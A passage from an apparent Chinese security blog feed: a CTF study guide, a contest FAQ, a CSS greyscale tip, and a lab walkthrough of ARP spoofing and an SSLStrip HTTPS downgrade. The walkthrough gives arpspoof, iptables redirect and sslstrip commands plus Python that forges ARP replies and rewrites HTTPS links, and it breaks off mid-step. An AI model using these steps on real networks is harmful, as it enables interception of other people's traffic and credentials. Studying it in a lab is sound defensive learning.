<li>Understand Cookie, session and token: what they are, what they do, and why they are needed</li>
<li>Understand the role of Referer, X-Forwarded-For and similar headers</li>
</ul>
</li>
<li><p>Before the vulnerability topics: once you understand the above, you can move on to the (more advanced) material below. Working through the material above may take about 3 weeks; keep at it and keep asking questions.</p>
<p>SQL injection</p>
<p>XSS attacks</p>
<p>File upload vulnerabilities</p>
<p>File inclusion vulnerabilities</p>
<p>Command execution vulnerabilities</p>
<p>...</p>
</li>
</ul>
<p>Some recommended learning sites<br><a href="https://ctf-wiki.github.io/ctf-wiki/%3E">https://ctf-wiki.github.io/ctf-wiki/%3E</a> <a href="https://xz.aliyun.com/">https://xz.aliyun.com/</a> <a href="https://www.anquanke.com/">https://www.anquanke.com/</a> <a href="https://github.com/CHYbeta/Web-Security-Learning">https://github.com/CHYbeta/Web-Security-Learning</a></p>
<p>Some recommended problem sets<br><a href="https://cgctf.nuptsast.com/login">https://cgctf.nuptsast.com/login</a> <a href="https://www.jarvisoj.com/login">https://www.jarvisoj.com/login</a></p>
<p>Some recommended blogs<br><a href="https://chybeta.github.io/">https://chybeta.github.io/</a> <a href="https://www.jianshu.com/u/bf30f18c872c">https://www.jianshu.com/u/bf30f18c872c</a> <a href="https://skysec.top/">https://skysec.top/</a> <a href="https://lorexxar.cn/">https://lorexxar.cn/</a></p>
<p>Recommended books<br>《白帽子讲web安全》 《黑客攻防技术宝典·Web实战篇》</p>
<h2 id="2-Crypto的详细入门指导"><a href="#2-Crypto的详细入门指导" class="headerlink" title="2.Crypto的详细入门指导"></a><a id="crypto">2. Detailed Crypto beginner's guide</a></h2><p>Cryptography needs a fairly strong mathematical background. ctf wiki is also a good starting point. Learn how each cipher works and the attacks against it. For each cipher, the English Wikipedia article is recommended: it is very detailed and usually includes source code. When starting out you can copy scripts without worrying much about the mathematics, and study it in detail once you know more.</p>
<p>Classical ciphers (the ones that need a wild imagination): link. RSA attack round-up: <a href="https://xz.aliyun.com/t/2446#toc-32">https://xz.aliyun.com/t/2446#toc-32</a> RSA Coppersmith attacks: <a href="https://github.com/mimoo/RSA-and-LLL-attacks">https://github.com/mimoo/RSA-and-LLL-attacks</a></p>
<p>A pile of cryptography problems: <a href="https://cryptopals.com/">https://cryptopals.com/</a></p>
<p>Recommended books: 《深入浅出密码学——常用加密技术原理与应用》 《密码编码学与网络安全——原理与实践(第七版)》 《图解密码技术》 《应用密码学:协议、算法与C源程序》</p>
<h2 id="3-Misc的详细入门指导"><a href="#3-Misc的详细入门指导" class="headerlink" title="3.Misc的详细入门指导"></a><a id="misc">3. Detailed Misc beginner's guide</a></h2><p>Misc is short for miscellaneous. It covers a lot of ground and requires broad knowledge and the ability to learn new things quickly. It usually includes forensics, steganalysis, encoding conversion, information gathering, traffic analysis and so on; sometimes the classical ciphers from cryptography are put under Misc too. Forensics and steganography are the most important part of Misc: you need to know the many steganography tricks, have solid scripting skills, and be able to use the various steganography tools.</p>
<p>Steganography <a href="https://www.jianshu.com/p/02fdd5edd9fc">https://www.jianshu.com/p/02fdd5edd9fc</a><br>Traffic analysis 《Wireshark网络分析就这么简单》<br>ctf-wiki: <a href="https://ctf-wiki.github.io/ctf-wiki/misc/introduction-zh/">https://ctf-wiki.github.io/ctf-wiki/misc/introduction-zh/</a></p>
<h2 id="适合萌新刷题入门传送门"><a href="#适合萌新刷题入门传送门" class="headerlink" title="适合萌新刷题入门传送门"></a><a id="catch_flag">Practice problems for newcomers</a></h2><ul>
<li><a href="https://adworld.xctf.org.cn/">攻防世界 (adworld), has a beginner section</a></li>
<li><a href="https://hack.lug.ustc.edu.cn/">2019 USTC CTF freshman contest</a></li>
<li><a href="https://cgctf.nuptsast.com/">NJUPT network attack and defence platform, mostly easy problems</a></li>
<li><a href="https://picoctf.com/">picoCTF 2018 and 2019, a US CTF aimed at high-school students</a></li>
<li><a href="https://github.com/ustclug/hackergame2018-writeups">2018 USTC CTF freshman contest, GitHub archive</a></li>
</ul>
]]></content>
<categories>
<category>kali</category>
</categories>
<tags>
<tag>CTF</tag>
<tag>景衡杯</tag>
</tags>
</entry>
<entry>
<title>[Jingheng Cup] 2020 Geek Pioneer Cup FAQ</title>
<url>/2020/05/17/%E3%80%90%E6%99%AF%E8%A1%A1%E6%9D%AF%E3%80%912020%E6%9E%81%E5%AE%A2%E5%85%88%E9%94%8B%E6%9D%AF%E7%9B%B8%E5%85%B3%E5%92%A8%E8%AF%A2/</url>
<content><![CDATA[<h2 id="1-什么是CTF"><a href="#1-什么是CTF" class="headerlink" title="1.什么是CTF"></a>1. What is CTF</h2><p>CTF (Capture The Flag), usually translated into Chinese as 夺旗赛, is a form of competition in which cybersecurity practitioners pit their skills against each other. CTF originated at the DEFCON hacker conference in 1996, replacing the earlier practice of hackers comparing skills by launching real attacks on each other.</p>
<h2 id="2-入门CTF,你需要什么"><a href="#2-入门CTF,你需要什么" class="headerlink" title="2.入门CTF,你需要什么"></a>2. What you need to get into CTF</h2><ul>
<li><p>The ability to learn new things quickly<br>A different way of thinking<br>A heart that enjoys solving problems<br>Some interesting network security techniques<br>A period of hard, fulfilling work</p>
</li>
<li><p>Here we would like to offer some advice:</p>
<p>Using Google search well helps you improve faster<br>Master at least one programming language, such as Python<br>Practice works better than anything else<br>Stay curious about and hungry for technology, and keep going</p>
</li>
</ul>
<h2 id="3-CTF是怎么比赛的"><a href="#3-CTF是怎么比赛的" class="headerlink" title="3.CTF是怎么比赛的"></a>3. How a CTF is played</h2><p>The scope of CTF problems is fairly broad, and there is no clear rule about exactly what is covered. Judging by current contests, problems are mainly classified as Web (network attack and defence), RE (reverse engineering), Pwn (binary exploitation), Crypto (cryptographic attacks), Mobile (mobile security) and Misc (security miscellany).</p>
<h3 id="但本次比赛,只会涉及到-Web、Crypto和Misc哈"><a href="#但本次比赛,只会涉及到-Web、Crypto和Misc哈" class="headerlink" title="但本次比赛,只会涉及到 Web、Crypto和Misc哈"></a>This contest, however, only covers Web, Crypto and Misc</h3><h3 id="Web-网络攻防"><a href="#Web-网络攻防" class="headerlink" title="Web - 网络攻防"></a>Web - network attack and defence</h3><p>Mainly the common Web vulnerabilities such as SQL injection, XSS, CSRF, file inclusion, file upload, code audit and PHP weak typing; the typical Web problem types and approaches to solving them; plus some commonly used tools.</p>
<h3 id="Crypto-密码攻击"><a href="#Crypto-密码攻击" class="headerlink" title="Crypto - 密码攻击"></a>Crypto - cryptographic attacks</h3><p>Covers classical and modern cryptography. Classical ciphers are fun and come in many varieties; modern cryptography is highly secure and demands a deeper understanding of the algorithms.</p>
<h3 id="Misc-安全杂项"><a href="#Misc-安全杂项" class="headerlink" title="Misc - 安全杂项"></a>Misc - security miscellany</h3><p>Starting from 诸葛建伟's translation of 《线上幽灵:世界头号黑客米特尼克自传》 (Kevin Mitnick's Ghost in the Wires) and some typical Misc problems, it mainly covers information gathering, encoding analysis, forensics and steganalysis.</p>
<h3 id="4-web、Crypto和Misc的详细入门指导请戳我!"><a href="#4-web、Crypto和Misc的详细入门指导请戳我!" class="headerlink" title="4.web、Crypto和Misc的详细入门指导请戳我!"></a>4. <a href="https://glsakura.gitee.io/2020/05/17/%E3%80%90%E6%99%AF%E8%A1%A1%E6%9D%AF%E3%80%912020%E6%9E%81%E5%AE%A2%E5%85%88%E9%94%8B%E6%9D%AF%E5%85%A5%E9%97%A8%E6%8C%87%E5%AF%BC/">Click here for the detailed Web, Crypto and Misc beginner's guides!</a></h3><h2 id="5-总结"><a href="#5-总结" class="headerlink" title="5.总结"></a>5. Summary</h2><p>CTF may have a fairly high barrier to entry, but once you are in you will discover how much fun it is. Don't give up easily when you hit setbacks while learning; search for the relevant material on Google first and ask others only if you really can't find it. On how to ask questions, we recommend this article: <a href="https://github.com/ryanhanwu/How-To-Ask-Questions-The-Smart-Way/blob/master/README-zh_CN.md">How To Ask Questions The Smart Way</a></p>
<p>Feel free to ask in the group or contact association members with any questions.</p>
<h2 id="补充"><a href="#补充" class="headerlink" title="补充"></a>Addendum</h2><ul>
<li>Q: What if my skills or fundamentals are not good? Will you teach us?</li>
<li>A: Don't worry. Based on the level of most participants we will provide relevant material and targeted training for this contest. Don't worry about not knowing anything yet; everyone starts out as a beginner.</li>
</ul>
<h3 id="再次提醒:本次比赛,只会涉及到-Web、Crypto和Misc哈"><a href="#再次提醒:本次比赛,只会涉及到-Web、Crypto和Misc哈" class="headerlink" title="再次提醒:本次比赛,只会涉及到 Web、Crypto和Misc哈"></a>Reminder: this contest only covers Web, Crypto and Misc</h3>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>CTF</tag>
<tag>景衡杯</tag>
</tags>
</entry>
<entry>
<title>CSS to turn a whole website grey for a day of mourning</title>
<url>/2020/04/04/%E5%93%80%E6%82%BC%E6%97%A5%E7%BD%91%E7%AB%99%E5%85%A8%E7%AB%99%E5%8F%98%E7%81%B0CSS%E4%BB%A3%E7%A0%81/</url>
<content><![CDATA[<p>Today, 2020-04-04, to mourn the martyrs and compatriots who died in the fight against COVID-19, many websites turned entirely grey as a mark of mourning.</p>
<p>Take a look at Bilibili</p>
<p><img src="/img/%E5%93%80%E6%82%BC%E6%97%A5%E7%BD%91%E7%AB%99%E5%85%A8%E7%AB%99%E5%8F%98%E7%81%B0CSS%E4%BB%A3%E7%A0%81/image-20200404002945393.png" alt="image-20200404002945393"></p>
<p>This effect is achieved with pure CSS.</p>
<h2 id="全站变灰代码"><a href="#全站变灰代码" class="headerlink" title="全站变灰代码"></a>Whole-site greyscale code</h2><p>To turn the whole site grey, use the following</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">*{</span><br><span class="line"> filter: grayscale(100%);</span><br><span class="line"> -webkit-filter: grayscale(100%);</span><br><span class="line"> -moz-filter: grayscale(100%);</span><br><span class="line"> -ms-filter: grayscale(100%);</span><br><span class="line"> -o-filter: grayscale(100%);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>To apply greyscale only to the site's images:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">img{</span><br><span class="line"> filter: grayscale(100%);</span><br><span class="line"> -webkit-filter: grayscale(100%);</span><br><span class="line"> -moz-filter: grayscale(100%);</span><br><span class="line"> -ms-filter: grayscale(100%);</span><br><span class="line"> -o-filter: grayscale(100%);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>To apply it only to some images:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">/* this only affects images whose class is grey */</span><br><span class="line">img.grey{</span><br><span class="line"> filter: grayscale(100%);</span><br><span class="line"> -webkit-filter: grayscale(100%);</span><br><span class="line"> -moz-filter: grayscale(100%);</span><br><span class="line"> -ms-filter: grayscale(100%);</span><br><span class="line"> -o-filter: grayscale(100%);</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>This is the internet industry's way of mourning.</p>
<p>4 April: may the departed rest in peace, may the living strive on, and may the nation prosper.</p>
<h2 id="如何关掉b站的变灰效果"><a href="#如何关掉b站的变灰效果" class="headerlink" title="如何关掉b站的变灰效果"></a>How to turn off Bilibili's grey effect</h2><p><img src="/img/%E5%93%80%E6%82%BC%E6%97%A5%E7%BD%91%E7%AB%99%E5%85%A8%E7%AB%99%E5%8F%98%E7%81%B0CSS%E4%BB%A3%E7%A0%81/image-20200404003909614.png" alt="image-20200404003909614"></p>
<p>Open the developer console, search for <code>filter</code>, find this line of CSS and disable it; the site turns back to colour. The line is</p>
<p><code>-webkit-filter: grayscale(.95);</code></p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>References</h2><p><a href="https://segmentfault.com/a/1190000007781619">CSS to turn a whole website grey for a day of mourning</a></p>
<p><a href="https://juejin.im/post/5df3a049f265da33f8652882">Bilibili all grey with just one line of CSS: the CSS filter</a></p>
]]></content>
<categories>
<category>前端</category>
</categories>
<tags>
<tag>css</tag>
<tag>灰色</tag>
<tag>网站</tag>
</tags>
</entry>
<entry>
<title>How to carry out a complete SSLStrip attack</title>
<url>/2020/04/02/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/</url>
<content><![CDATA[<h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>Introduction</h2><p>This article describes how, on a local network, to intercept a victim's traffic and obtain sensitive information with an SSLStrip attack, in two steps:</p>
<ol>
<li>Man-in-the-middle attack: intercept the victim's traffic</li>
<li>SSLStrip attack: obtain sensitive information</li>
</ol>
<h2 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>Lab environment</h2><table>
<thead>
<tr>
<th></th>
<th>IP address</th>
<th align="left">MAC address</th>
</tr>
</thead>
<tbody><tr>
<td>win10</td>
<td>192.168.40.1</td>
<td align="left">00:50:56:C0:00:08</td>
</tr>
<tr>
<td>gateway</td>
<td>192.168.40.2</td>
<td align="left">00:50:56:E7:9F:31</td>
</tr>
<tr>
<td>kali</td>
<td>192.168.40.128</td>
<td align="left">00:0c:29:d8:d4:05</td>
</tr>
<tr>
<td>win7</td>
<td>192.168.40.130</td>
<td align="left">00:0C:29:C9:34:A6</td>
</tr>
<tr>
<td>centos7</td>
<td>192.168.40.132</td>
<td align="left">00:0c:29:bd:ef:65</td>
</tr>
</tbody></table>
<p>kali:<a href="http://mirrors.aliyun.com/kali-images/kali-2020.1b/kali-linux-2020.1b-live-amd64.iso">kali-linux-2020.1b-live-amd64.iso</a></p>
<p>win7:<a href="http://d0.ananas.chaoxing.com/download/16169a8dcb8f0e07b98d19c870b10ce3?fn=WIN7lite(x64)">win7</a></p>
<p>These are clean virtual machine images; import them into VMware or VirtualBox.<br>The Win7 image is built from Win7 SP1, heavily stripped down with no extra components; it runs smoothly and comes pre-activated.</p>
<h2 id="中间人攻击"><a href="#中间人攻击" class="headerlink" title="Man-in-the-middle attack"></a>Man-in-the-middle attack</h2><p>In a man-in-the-middle attack (MITM) the attacker places themself between two communicating parties, which allows them to hijack a session and steal credentials and other confidential data. In short, a MITM attack intercepts what would otherwise be normal network traffic and tampers with or sniffs it, while neither endpoint notices.</p>
<h3 id="ARP-(地址解析协议)"><a href="#ARP-(地址解析协议)" class="headerlink" title="ARP (Address Resolution Protocol)"></a>ARP (Address Resolution Protocol)</h3><p>ARP resolves an IP address to a MAC (hardware) address; on Ethernet, frames are delivered by MAC address.</p>
<p>ARP works like this: when win10 wants to send data to win7 (192.168.40.130), it first broadcasts "who has 192.168.40.130?" to every host on the segment. Normally all other hosts ignore the request and only win7 answers "192.168.40.130 is at my MAC address", after which communication can start. Every host keeps its own ARP cache of IP-to-MAC mappings, so the broadcast is not repeated for every packet.</p>
<h4 id="如何进行ARP欺骗"><a href="#如何进行ARP欺骗" class="headerlink" title="How does ARP spoofing work?"></a>How does ARP spoofing work?</h4><p>Suppose kali wants to impersonate win7. Instead of ignoring win10's request, it floods win10 with ARP replies claiming "no, <em>I</em> am 192.168.40.130". win10 creates or updates its ARP entry for that IP with kali's MAC address, and from then on everything win10 sends to 192.168.40.130 is delivered to kali instead. ARP has no authentication, and most network stacks accept replies they never asked for, which is what makes this possible.</p>
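<p>The exchange described above, as an added example that is not part of the original post: a Python script that builds the forged ARP reply kali would send as raw bytes (RFC 826 layout inside an Ethernet II frame), parses it back, and shows how win10's cache ends up pointing 192.168.40.130 at kali's MAC. The addresses are the ones from the lab table (MACs written in lower case); the frames are only constructed in memory and nothing is put on the wire. The <code>ArpCache</code> class illustrates two cache policies and is not a model of any particular operating system.</p>

```python
import struct

ETH_P_ARP = 0x0806               # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2

# Lab addresses from the table above (constructed for the example, MACs lower-cased)
WIN10_IP, WIN10_MAC = "192.168.40.1", "00:50:56:c0:00:08"
WIN7_IP, WIN7_MAC = "192.168.40.130", "00:0c:29:c9:34:a6"
KALI_MAC = "00:0c:29:d8:d4:05"


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def fmt_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def fmt_ip(raw):
    return ".".join(str(b) for b in raw)


def build_arp(oper, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an ARP packet: hardware type 1 (Ethernet),
    protocol type 0x0800 (IPv4), 6-byte hardware and 4-byte protocol
    addresses, the operation code, then sender and target address pairs."""
    eth_hdr = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp_hdr = struct.pack("!HHBBH", 1, 0x0800, 6, 4, oper)
    body = mac_bytes(sender_mac) + ip_bytes(sender_ip) + mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth_hdr + arp_hdr + body


def parse_arp(frame):
    """Inverse of build_arp; rejects anything that is not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP address encoding")
    return {
        "oper": oper,
        "sender_mac": fmt_mac(frame[22:28]), "sender_ip": fmt_ip(frame[28:32]),
        "target_mac": fmt_mac(frame[32:38]), "target_ip": fmt_ip(frame[38:42]),
    }


class ArpCache:
    """Illustrative cache. strict=False is the behaviour the attack relies on:
    any reply overwrites the entry. strict=True keeps the first binding and
    only records the conflict, which is what an ARP-monitoring tool alerts on."""

    def __init__(self, strict=False):
        self.strict = strict
        self.table = {}        # ip -> mac
        self.conflicts = []    # (ip, old_mac, new_mac)

    def learn(self, frame):
        pkt = parse_arp(frame)
        if pkt["oper"] != ARP_REPLY:
            return
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        old = self.table.get(ip)
        if old is not None and old != mac:
            self.conflicts.append((ip, old, mac))
            if self.strict:
                return          # refuse to rebind an IP we already know
        self.table[ip] = mac


def poison_demo(strict=False):
    """win7 answers honestly once, then kali floods forged replies for win7's IP."""
    cache = ArpCache(strict)
    cache.learn(build_arp(ARP_REPLY, WIN7_MAC, WIN7_IP, WIN10_MAC, WIN10_IP))
    for _ in range(3):
        cache.learn(build_arp(ARP_REPLY, KALI_MAC, WIN7_IP, WIN10_MAC, WIN10_IP))
    return cache


if __name__ == "__main__":
    for strict in (False, True):
        c = poison_demo(strict)
        print(f"strict={strict}: {WIN7_IP} -> {c.table[WIN7_IP]}, conflicts={len(c.conflicts)}")
```

With the naive policy the cache ends up mapping 192.168.40.130 to kali's MAC after the first forged reply; with the strict policy the original binding survives and each forged reply is logged as a conflict, which is the signal a defender looks for.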
<h3 id="攻击准备"><a href="#攻击准备" class="headerlink" title="Preparation"></a>Preparation</h3><h4 id="mac-下准备"><a href="#mac-下准备" class="headerlink" title="On macOS"></a>On macOS</h4><ol>
<li>Install MacPorts (<a href="https://link.jianshu.com/?t=https://www.macports.org/install.php">official site</a>)</li>
<li>Update MacPorts: <code>sudo port -d selfupdate</code></li>
<li>Install dsniff (which contains the ARP spoofing tool): <code>sudo port install dsniff</code></li>
<li>Install nmap: <code>brew install nmap</code> (if Homebrew is not installed, see the <a href="https://link.jianshu.com/?t=http://brew.sh/">Homebrew site</a>)</li>
</ol>
<h4 id="linux-下准备"><a href="#linux-下准备" class="headerlink" title="On Linux"></a>On Linux</h4><ol>
<li>Install dsniff: <code>apt-get install -y dsniff</code></li>
<li>Install nmap: <code>apt-get install -y nmap</code></li>
</ol>
<h3 id="攻击步骤"><a href="#攻击步骤" class="headerlink" title="Attack steps"></a>Attack steps</h3><p>1. Find the target</p>
<p>Scan the LAN with nmap to get the list of live hosts.<br>If the router address is 192.168.40.1, run <code>nmap -sP 192.168.40.1/24</code>.</p>
<p><code>-sP</code> is a ping (host discovery) scan; current nmap releases spell the same option <code>-sn</code> and keep <code>-sP</code> as an alias. <code>192.168.40.1/24</code> covers every address from 192.168.40.1 to 192.168.40.254.</p>
<p>2. Enable IP forwarding</p>
<p>ARP spoofing usually aims to impersonate the gateway. Without further action, though, the redirected packets are simply dropped when they reach the attacking machine: it is not the gateway and has no idea what to do with them. Nothing gets back to the victim, which loses its connection, and that is not acceptable. Enabling IP forwarding solves this: the kernel forwards those packets on to the real gateway. It is enabled as follows.</p>
<p>On macOS:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">sysctl -w net.inet.ip.forwarding=1</span><br></pre></td></tr></table></figure>
<p>On Linux:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">echo 1 >/proc/sys/net/ipv4/ip_forward</span><br></pre></td></tr></table></figure>
<p>3. ARP spoofing</p>
<p>Assume the target is 192.168.40.130, the gateway is 192.168.40.2, and the attacker's interface is eth0 (check with <code>ifconfig</code>). The spoofing command is then:</p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">arpspoof -i eth0 -t 192.168.40.130 192.168.40.2</span><br></pre></td></tr></table></figure>
<blockquote>
<p>arpspoof is part of dsniff and is used specifically for ARP spoofing. Note that the command above only poisons the target's idea of where the gateway is, so only traffic from the victim to the Internet passes through the attacker. To see the replies as well, run a second arpspoof with the two addresses swapped (target the gateway and claim the victim's IP); otherwise the return path goes straight from the gateway to the victim.</p>
</blockquote>
<p>If it works, the ARP table on the victim looks like this:</p>
<p><img src="/img/%E5%A6%82%E4%BD%95%E8%BF%9B%E8%A1%8C%E4%B8%80%E6%AC%A1%E5%AE%8C%E6%95%B4%E7%9A%84%20SSLStrip%20%E6%94%BB%E5%87%BB/image-20200402181122459.png" alt="image-20200402181122459"></p>
<blockquote>
<p>Show the system's cached ARP table with <code>arp -a</code></p>
</blockquote>
<p>4. Analyse the data</p>
<p>Once ARP spoofing succeeds, everything the victim sends passes through our machine first, and we can analyse it with tools such as ettercap.</p>
<h3 id="使用driftnet获取图片"><a href="#使用driftnet获取图片" class="headerlink" title="Capturing images with driftnet"></a>Capturing images with driftnet</h3><p>Install driftnet: <code>apt-get install driftnet</code></p>
<p>Start capturing: <code>driftnet -i eth0</code></p>
<p>Find a plain-HTTP site to test with, for example using this search query:</p>
<p><code>inurl:"http" -https</code></p>
<p>Example: <code>http://www.kan-tv.com/</code></p>
<p>Tip: HTTPS traffic is encrypted and cannot be read directly; after the SSLStrip attack below it can be.</p>
<h2 id="SSLStrip-攻击"><a href="#SSLStrip-攻击" class="headerlink" title="SSLStrip attack"></a>SSLStrip attack</h2><p>At Black Hat in 2009 the researcher Moxie Marlinspike released a tool called sslstrip, which performs a man-in-the-middle attack against SSL.</p>
<p>SSLstrip is also called an HTTPS downgrade attack: after intercepting the user's traffic, the attacker tricks the user into talking to the attacker over plain HTTP while the attacker keeps talking to the server normally (over HTTP or HTTPS), and so obtains the user's data.</p>
<h3 id="攻击原理"><a href="#攻击原理" class="headerlink" title="How it works"></a>How it works</h3><p>The attacker exploits the fact that users rarely notice whether the address bar says HTTPS or HTTP: every HTTPS link is replaced with an HTTP one, while the attacker keeps a normal HTTPS connection to the real server. Because HTTP is unencrypted, the attacker can sniff it at will.</p>
<ol>
<li>Intercept HTTP traffic from the man-in-the-middle position</li>
<li>Rewrite the <code>Location</code> header of redirects, replacing https with http, and record the change</li>
<li>Rewrite the hyperlinks in response bodies, replacing https with http, and record the change</li>
<li>Talk HTTP to the user and HTTPS to the server (for the recorded requests that should have been HTTPS), obtaining the user's data in clear text</li>
</ol>
<p>Tips:</p>
<p>When a page the user is browsing contains HTTPS links, the requests for them are turned into HTTP requests.</p>
<p>sslstrip is not a cure-all, though: if the page contains no literal https link but JavaScript builds the HTTPS URL and redirects to it on an event, sslstrip never sees the URL to rewrite and the attack fails.</p>
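<p>The four steps above, as an added example that is not sslstrip's own code: a small Python class that performs the rewrite of <code>Location</code> headers and HTML links, keeps the record of what was downgraded, and answers the question the proxy has to ask for each later plain request from the victim ("was this one originally HTTPS?"). The sample redirect and login page are constructed for the example (the <code>.test</code> domain is reserved for that purpose); a real proxy additionally has to handle cookies, compressed bodies and the network plumbing, none of which is shown here.</p>

```python
import re

# An https URL: host in group 1, optional path in group 2. The path stops at
# a quote, angle bracket or whitespace so the pattern works inside href="..."
# attributes and inside header values alike.
SECURE_LINK = re.compile(r"https://([A-Za-z0-9.-]+)(/[^\s\"'<>]*)?", re.IGNORECASE)


class SslStripState:
    """Core of the technique: rewrite https:// to http:// in what the victim
    receives, and remember each downgraded host/path so the matching plain
    request from the victim can be relayed to the real server over TLS."""

    def __init__(self):
        self.stripped = set()   # {(host, path)} the victim will now request over HTTP

    def _downgrade(self, match):
        host = match.group(1).lower()
        path = match.group(2) or "/"
        self.stripped.add((host, path))           # the "record" in steps 2 and 3
        return f"http://{host}{path}"

    def rewrite_text(self, text):
        return SECURE_LINK.sub(self._downgrade, text)

    def rewrite_response(self, status, headers, body):
        """Step 2: rewrite a Location header. Step 3: for HTML bodies, rewrite
        every literal https:// link. Returns (new_headers, new_body)."""
        new_headers = {}
        content_type = ""
        for name, value in headers.items():
            if name.lower() == "location":
                value = self.rewrite_text(value)
            if name.lower() == "content-type":
                content_type = value
            new_headers[name] = value
        if "html" in content_type.lower():
            body = self.rewrite_text(body)
        return new_headers, body

    def upstream_scheme(self, host, path):
        """Step 4: scheme to use towards the real server for a request the
        victim sent over plain HTTP."""
        return "https" if (host.lower(), path) in self.stripped else "http"


# Constructed sample traffic from a fictitious server.
REDIRECT = (302,
            {"Location": "https://login.example.test/account/signin",
             "Content-Type": "text/html"},
            '<a href="https://login.example.test/account/signin">Sign in</a>')
LOGIN_PAGE = (200,
              {"Content-Type": "text/html; charset=utf-8"},
              '<form action="https://login.example.test/do_login" method="post">'
              '<img src="https://static.example.test/lock.png"></form>'
              '<a href="http://news.example.test/">news</a>')


def demo():
    """Run both responses through the stripper; returns state and rewritten pieces."""
    state = SslStripState()
    r_headers, r_body = state.rewrite_response(*REDIRECT)
    _, p_body = state.rewrite_response(*LOGIN_PAGE)
    return state, r_headers, r_body, p_body


if __name__ == "__main__":
    state, r_headers, _, p_body = demo()
    print("Location ->", r_headers["Location"])
    print("Body     ->", p_body)
    print("Relay /do_login upstream over", state.upstream_scheme("login.example.test", "/do_login"))
```

Two limits follow directly from the code. It only rewrites URLs that appear literally in the response text, which is the JavaScript case the tip above describes. And it only ever sees the victim's first plain-HTTP request: a browser that already knows a site as HSTS (including the preload list shipped with the browser) never sends that request, so there is nothing to downgrade.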
<h3 id="攻击准备-1"><a href="#攻击准备-1" class="headerlink" title="Preparation"></a>Preparation</h3><ol>
<li><p>Intercept HTTP traffic</p>
</li>
<li><p>Get the <a href="https://moxie.org/software/sslstrip/">sslstrip tool</a></p>
<p>Requirements<br>Python >= 2.5 (apt-get install python)<br>The python "twisted-web" module (apt-get install python-twisted-web)</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">apt-get -y install python python-twisted-web</span><br><span class="line">git clone https://github.com/moxie0/sslstrip.git</span><br><span class="line">cd sslstrip && python ./setup.py install</span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="攻击步骤-1"><a href="#攻击步骤-1" class="headerlink" title="Attack steps"></a>Attack steps</h3><p>1. Enable kernel IP forwarding so the victim does not lose connectivity during the attack</p>
<p>Temporary:</p>
<p><code>echo 1 > /proc/sys/net/ipv4/ip_forward</code></p>
<p>Permanent:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">vim /etc/sysctl.conf</span><br><span class="line">net.ipv4.ip_forward = 1        # set this value in the file</span><br><span class="line">sysctl -p /etc/sysctl.conf     # apply the change</span><br></pre></td></tr></table></figure>
<p>2. Redirect traffic into sslstrip</p>
<p>Set up iptables to redirect HTTP traffic to sslstrip:<br><code>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000</code><br>The final port number (10000 here) is the port sslstrip listens on.</p>
<blockquote>
<h4 id="iptables命令使用详解"><a href="#iptables命令使用详解" class="headerlink" title="iptables options explained"></a>iptables options explained</h4><p>iptables controls packets entering, leaving and being forwarded by the machine; a rule can act on a packet whenever it enters the host, leaves it, or is routed through it.</p>
<p>-t: the table to operate on (the nat table is consulted when a packet that creates a new connection is encountered)</p>
<p>The nat table has three built-in chains: PREROUTING (alters packets as they come in), OUTPUT (alters locally generated packets before routing) and POSTROUTING (alters packets as they are about to go out)</p>
<p>-A: append a rule to the selected chain</p>
<p>-p: the protocol of the packets to match</p>
<p>--destination-port 80: match packets whose destination port is 80</p>
<p>-j REDIRECT --to-port 10000: redirect the matched port-80 traffic to local port 10000</p>
</blockquote>
<p>To delete the rule once the attack is over: <code>iptables -t nat -D PREROUTING 1</code></p>
<p>List the nat table: <code>iptables -t nat -L</code></p>
<p>3. Run arpspoof to convince the network that traffic should be sent to you.</p>
<p><code>arpspoof -i eth0 -t 192.168.40.130 192.168.40.2</code></p>
<blockquote>
<p>arpspoof -i &lt;interface&gt; -t &lt;target IP&gt; &lt;gateway&gt;</p>
</blockquote>
<p>4. Start sslstrip</p>
<p><code>sslstrip -l 10000</code></p>
<blockquote>
<p>-w &lt;filename&gt;, --write=&lt;filename&gt; Specify file to log to (optional).<br>-p, --post Log only SSL POSTs (default).<br>-s, --ssl Log all SSL traffic to and from server.<br>-a, --all Log all SSL and HTTP traffic to and from server.<br>-l &lt;port&gt;, --listen=&lt;port&gt; Port to listen on (default 10000).<br>-f, --favicon Substitute a lock favicon on secure requests.<br>-k, --killsessions Kill sessions in progress.<br>-h Print this help message.</p>
<p>Check what is using the port: <code>lsof -i tcp:10000</code></p>
<p><code>sslstrip -a -k -f -l 10000</code></p>
